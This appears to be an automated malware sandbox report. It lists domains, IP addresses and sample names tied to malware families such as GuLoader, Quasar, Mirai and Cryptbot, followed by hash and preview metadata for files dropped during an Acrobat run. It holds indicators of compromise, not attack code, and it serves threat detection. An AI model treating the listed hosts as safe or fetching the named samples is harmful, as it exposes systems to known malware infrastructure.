www.bluemaxxlaser.com | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | eua.ps1 | malicious | GuLoader | 203.175.174.69
www.bluemaxxlaser.com | zp.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | zk.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | mx.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | as.ps1 | malicious | GuLoader | 203.175.174.69
bg.microsoft.map.fastly.net | LFLtlBAuf7.exe | malicious | Quasar | 199.232.210.172
bg.microsoft.map.fastly.net | FjfZ7uM8zh.lnk | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | yswmdaREME.lnk | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 0bNBLjPn56.lnk | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Dix7g8PK1e.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | CROC000400 .pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | contract_signed.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | T.T_Copy.12.18.2024.exe | malicious | ArrowRAT | 199.232.214.172
bg.microsoft.map.fastly.net | 22054200882739718047.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | Sh2uIqqKqc.exe | malicious | Cryptbot | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAMNODEUS | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | FjfZ7uM8zh.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | yswmdaREME.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | 0bNBLjPn56.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | owari.x86.elf | malicious | Unknown | 168.235.88.56
SGGS-AS-APSGGSSG | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | teste.x86.elf | malicious | Mirai, Moobot, Okiru | 103.14.247.60
SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.29
SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.60
SGGS-AS-APSGGSSG | jZ6ejWIrSV.elf | malicious | Gafgyt, Mirai | 103.14.247.64
SGGS-AS-APSGGSSG | IGvLaRmr0J.elf | malicious | Gafgyt, Mirai | 103.14.247.58
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | fs8cRx6Us2.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 1AqzGcCKey.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | v4BET4inNV.vbs | malicious | GuLoader | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | ER4HMMzeQ3.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | BJtvb5Vdhh.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | HquJT7q6xG.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | hKvlV6A1Rl.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | kqeGVKtpy2.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | LFLtlBAuf7.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | O9MV0lNEO5.exe | malicious | Quasar | 107.161.23.150
                                                                                  No context
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7067398985040838
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq1:2JIB/wUKUKQncEmYRTwh05
                                                                                  MD5:D2C824B67FE814E48F5E5EC6BA065DDB
                                                                                  SHA1:F73026A621A8CF9FC192FB2CC557E8D5A5DCE3DE
                                                                                  SHA-256:E30DF985A47DEBA4CD829949CA8A600021603C2BF9BC97F324FF1643B76D6804
                                                                                  SHA-512:8F17AA1293654D6544EFA5FFE3258ED6942A878C40F385C9A0BD9124A9F70FE860C879C7F8B6E8A94CD4AA303EB8F590348E18078DE947696EC4D87E85B2D326
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x359b2b3d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7900383425452844
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:aDASB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+D:DazaPvgurTd42UgSii
                                                                                  MD5:8E27234EB3E7D561D2142976BB968A0C
                                                                                  SHA1:B521AD072263958537E67DF23B717F37B52A063D
                                                                                  SHA-256:5D11FF120A3F99E21D59E367A6AA91A5E977897D3218A07EA099C77BF1FE95C9
                                                                                  SHA-512:3BC31FFB6A25F355939304BB97EB982A414F0FC481C623D86104CAE4BE721B51879A00FE275434E3D55B88413B951E71ACC29C7B0B963B76ABEDDE3124C7C832
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:5.+=... ...............X\...;...{......................0.`.....42...{5.!,...|9.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{....................................\.!,...|..................#...!,...|9..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.08230096917654028
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:p+KYezjcvxzeqt/57Dek3JcKEg2cv/YllEqW3l/TjzzQ/t:MKzzszPR3t7EgjImd8/
                                                                                  MD5:5BB2617F9E71BF94A913D3F0DCCE519F
                                                                                  SHA1:503A556455E5E7FAFECEA602913C604071675954
                                                                                  SHA-256:38AB16E0E2BCC6F590977B866FBAA3248646BEF97A507BA2926A5AFE72F352C7
                                                                                  SHA-512:61B6F49CF4777D045AACFBA5900EA371F573A6F9B770A5D527D51601B3AC12338F88CF8C760DF2620A9BB5449D010765C197C8A154EF1702D7FDE550177837E9
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):300
                                                                                  Entropy (8bit):5.22209574423176
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PrXFUAyq2PcNwi2nKuAl9OmbnIFUt8OPrRFH1Zmw+OPr+RkwOcNwi2nKuAl9Omt:7PrXuAyvLZHAahFUt8OPrjV/+OPr+R5h
                                                                                  MD5:CA522670EDD91A4B061444C17F186881
                                                                                  SHA1:039D2FA20374313B17E4C483FEF47CFFAD5344B0
                                                                                  SHA-256:F45028B55C92ED0F61353B54F381CB4092C5DF55E3EC690E523B7CAF9844E1AD
                                                                                  SHA-512:CF4A23108A3DF7DDA93562AE98E1C084AF22C1B358EA01DE8F0599ED4F472AB3E87E3C35DEBA3FB542BE22F809D4A5F79439C7A7EF28DD413E7615762CDA9DC4
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.062 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:44:33.064 1be4 Recovering log #3.2024/12/19-06:44:33.065 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):300
                                                                                  Entropy (8bit):5.22209574423176
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PrXFUAyq2PcNwi2nKuAl9OmbnIFUt8OPrRFH1Zmw+OPr+RkwOcNwi2nKuAl9Omt:7PrXuAyvLZHAahFUt8OPrjV/+OPr+R5h
                                                                                  MD5:CA522670EDD91A4B061444C17F186881
                                                                                  SHA1:039D2FA20374313B17E4C483FEF47CFFAD5344B0
                                                                                  SHA-256:F45028B55C92ED0F61353B54F381CB4092C5DF55E3EC690E523B7CAF9844E1AD
                                                                                  SHA-512:CF4A23108A3DF7DDA93562AE98E1C084AF22C1B358EA01DE8F0599ED4F472AB3E87E3C35DEBA3FB542BE22F809D4A5F79439C7A7EF28DD413E7615762CDA9DC4
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.062 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:44:33.064 1be4 Recovering log #3.2024/12/19-06:44:33.065 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):341
                                                                                  Entropy (8bit):5.25516706424098
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PlUVq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPlR80gZmw+OPlRAIkwOcNwi2nKuAlx:7PWvLZHAa8uFUt8OPLM/+OPXD54ZHAaU
                                                                                  MD5:BBD7E9F8BB6003846AF63200AA406636
                                                                                  SHA1:AE62A49978A47DE3DFB0E46814BB4AAD369B781B
                                                                                  SHA-256:1309C6BB4822F48C3E25EE7F82AE669A57CFCF445688BED52D1CD421D5393EF2
                                                                                  SHA-512:1DA39A9626F1353EB56C320A5038CDC36399D4408A819B9380BDDE8AD5723D4596B5470A8D7A79500BF2C7DE7C3E62ECE64A9D24CE92613AA30364A7ABC77694
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.083 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:44:33.084 674 Recovering log #3.2024/12/19-06:44:33.085 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):341
                                                                                  Entropy (8bit):5.25516706424098
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PlUVq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPlR80gZmw+OPlRAIkwOcNwi2nKuAlx:7PWvLZHAa8uFUt8OPLM/+OPXD54ZHAaU
                                                                                  MD5:BBD7E9F8BB6003846AF63200AA406636
                                                                                  SHA1:AE62A49978A47DE3DFB0E46814BB4AAD369B781B
                                                                                  SHA-256:1309C6BB4822F48C3E25EE7F82AE669A57CFCF445688BED52D1CD421D5393EF2
                                                                                  SHA-512:1DA39A9626F1353EB56C320A5038CDC36399D4408A819B9380BDDE8AD5723D4596B5470A8D7A79500BF2C7DE7C3E62ECE64A9D24CE92613AA30364A7ABC77694
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.083 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:44:33.084 674 Recovering log #3.2024/12/19-06:44:33.085 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:JSON data
                                                                                  Category:modified
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.96775079901533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sq5NsBdOg2H90caq3QYiubSpDyP7E4TX:Y2sRdspdMHt3QYhbSpDa7n7
                                                                                  MD5:447F2FA7D23630661C00083D4C2048C9
                                                                                  SHA1:8E05FA35124627824C336AFFC0827DDB09234A8F
                                                                                  SHA-256:C70A336A0B1E0CA6128D54D2AC6DFB62AB2B1799BF0750B639AF148E71B34152
                                                                                  SHA-512:9179A7E8C0F3D532F718BC8E34CE68E5BD67D9997FB34FBBFFB0719547F1F1AA0F807E6FAD223DA9470BF160E110C0B439543059E343DEC526CFFA3C55C98F13
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168682704213","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":633697},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.96775079901533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sq5NsBdOg2H90caq3QYiubSpDyP7E4TX:Y2sRdspdMHt3QYhbSpDa7n7
                                                                                  MD5:447F2FA7D23630661C00083D4C2048C9
                                                                                  SHA1:8E05FA35124627824C336AFFC0827DDB09234A8F
                                                                                  SHA-256:C70A336A0B1E0CA6128D54D2AC6DFB62AB2B1799BF0750B639AF148E71B34152
                                                                                  SHA-512:9179A7E8C0F3D532F718BC8E34CE68E5BD67D9997FB34FBBFFB0719547F1F1AA0F807E6FAD223DA9470BF160E110C0B439543059E343DEC526CFFA3C55C98F13
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168682704213","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":633697},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4099
                                                                                  Entropy (8bit):5.231840796680241
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP26B+:CwNw1GHqPySfkcigoO3h28ytP26B+
                                                                                  MD5:A639FD3E4D5ACAA9F0815FE34AF35D46
                                                                                  SHA1:6ECAF63203F220C17B0928CC6A04256B3DD70F64
                                                                                  SHA-256:73024A082AC957A9EF46F34BA64209D3E05CC995495C7BB9091C5CA8B478EA2A
                                                                                  SHA-512:210C332DD021D115D658D817B25491519F38A246BA1DF6E954FBDCA9812C586909453860E44D344ADCBCC24E06EA4FD59AADA24EDAF7B6DCE675A40AB61A3982
                                                                                  Malicious:false
                                                                                  Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):329
                                                                                  Entropy (8bit):5.231414091343518
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PbRFOSVq2PcNwi2nKuAl9OmbzNMxIFUt8OPZ/FwgZmw+OP4lIkwOcNwi2nKuAlG:7PbRRvLZHAa8jFUt8OP1FZ/+OPH54ZHP
                                                                                  MD5:DB7C5FB2D061537B8D4EEE99D020C00B
                                                                                  SHA1:CD1DF5712EAA66C04BF2AF60A3A572D24E3898A3
                                                                                  SHA-256:C3C58F6C1DF5477F57A0D1DFC7F10169A7AFDAC25E9BF2F4BDDCF7C040E059D1
                                                                                  SHA-512:7B5C176B228240A81B93526AD12C08167C44EB286482B864FA9948B407AE4A54FA3E8D6A1005CC55CB825DBA5F1DD158519176658C54F34D9D0AA7DEC19404D5
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.604 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:44:33.629 674 Recovering log #3.2024/12/19-06:44:33.636 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):329
                                                                                  Entropy (8bit):5.231414091343518
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PbRFOSVq2PcNwi2nKuAl9OmbzNMxIFUt8OPZ/FwgZmw+OP4lIkwOcNwi2nKuAlG:7PbRRvLZHAa8jFUt8OP1FZ/+OPH54ZHP
                                                                                  MD5:DB7C5FB2D061537B8D4EEE99D020C00B
                                                                                  SHA1:CD1DF5712EAA66C04BF2AF60A3A572D24E3898A3
                                                                                  SHA-256:C3C58F6C1DF5477F57A0D1DFC7F10169A7AFDAC25E9BF2F4BDDCF7C040E059D1
                                                                                  SHA-512:7B5C176B228240A81B93526AD12C08167C44EB286482B864FA9948B407AE4A54FA3E8D6A1005CC55CB825DBA5F1DD158519176658C54F34D9D0AA7DEC19404D5
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.604 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:44:33.629 674 Recovering log #3.2024/12/19-06:44:33.636 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                  Category:dropped
                                                                                  Size (bytes):65110
                                                                                  Entropy (8bit):0.6376462682686903
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                  MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                  SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                  SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                  SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                  Category:dropped
                                                                                  Size (bytes):86016
                                                                                  Entropy (8bit):4.439157462977668
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:yeaci5GtiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1BurVgazUpUTTGt
                                                                                  MD5:56CCD1DA7A41DD4CB2EE71389AF234E8
                                                                                  SHA1:913B33E9C3223679D65923EBDF7DFA0F67942DF1
                                                                                  SHA-256:C6525B657863C95A83B856FE33C0C7C70B0FD9B6C84237200695C76057E248C4
                                                                                  SHA-512:6508048B04F44175507BC3AC01DA0431F80086179AB222623180AC8B093D301ECD5AB638B71947FFBD0D334D332DB14B19970B7250907C79023D4C8B25C93DCC
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):3.7766890061287954
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MEp/E2ioyVPioy3DoWoy1CABoy1PKOioy1noy1AYoy1Wioy1hioybioyQoy1noF:7XpjuP0iARXKQVOb9IVXEBodRBkh
                                                                                  MD5:B46E93FB8DC97C40ABE613B5661B8FC8
                                                                                  SHA1:C1496C99B49E93719B3B19C0E43DEFEA20738A62
                                                                                  SHA-256:218ADDFC0E0893B5662BF3069AA209635C6A9E82A520591E39024D164962B02D
                                                                                  SHA-512:2545E65F3C94479A46917EAAB838515D27072FE9C885C7379D3779EB5050A04578A40BC2661E133F263549C2E42321BBBB5CC27E23C24E54E13B285B663BA76B
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Certificate, Version=3
                                                                                  Category:dropped
                                                                                  Size (bytes):1391
                                                                                  Entropy (8bit):7.705940075877404
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):192
                                                                                  Entropy (8bit):2.728204828358771
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFklV0WwfllXlE/HT8kPJtNNX8RolJuRdxLlGB9lQRYwpDdt:kK1WhT86NMa8RdWBwRd
                                                                                  MD5:CB9E7CD02000F7DE8C3D88D1D16B19EC
                                                                                  SHA1:710B9AD5C389F316B98D5215F2A04F9A923A0FC6
                                                                                  SHA-256:6541ABC369837A70384DB24A3FBE3ABEC694EEE55F7E4D84533AB5252D9514C9
                                                                                  SHA-512:1AA0092B006481C674FED9010786712EB9E7E0FF038E3058B155D241D6E737BCBA3061A0DEDFD5AFEE040F41A6C4A4E2C0AA53A77CEDFEA1800FB35C7E41B586
                                                                                  Malicious:false
                                                                                  Preview:p...... ........f.5f.R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.253995428229511
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKibT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:62DImsLNkPlE99SNxAhUe/3
                                                                                  MD5:A5222321CAC7523956C66DC8DA59885E
                                                                                  SHA1:AC883023C3F50AD6DD9F02EA1682F031F053D4D9
                                                                                  SHA-256:9FE8642921B1A253789D019D4853885ABF459B6E726C0E81EA84B2705E7C1FC4
                                                                                  SHA-512:CC1825CF4175CCF83EE1EF442F93DC8B598D7EFB77AEF4919AED626E37F0495F54798DEDF732FF6308D36AAF92320FB1540BB3E9A24113035A1A702EA5094222
                                                                                  Malicious:false
                                                                                  Preview:p...... ........J..y.R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
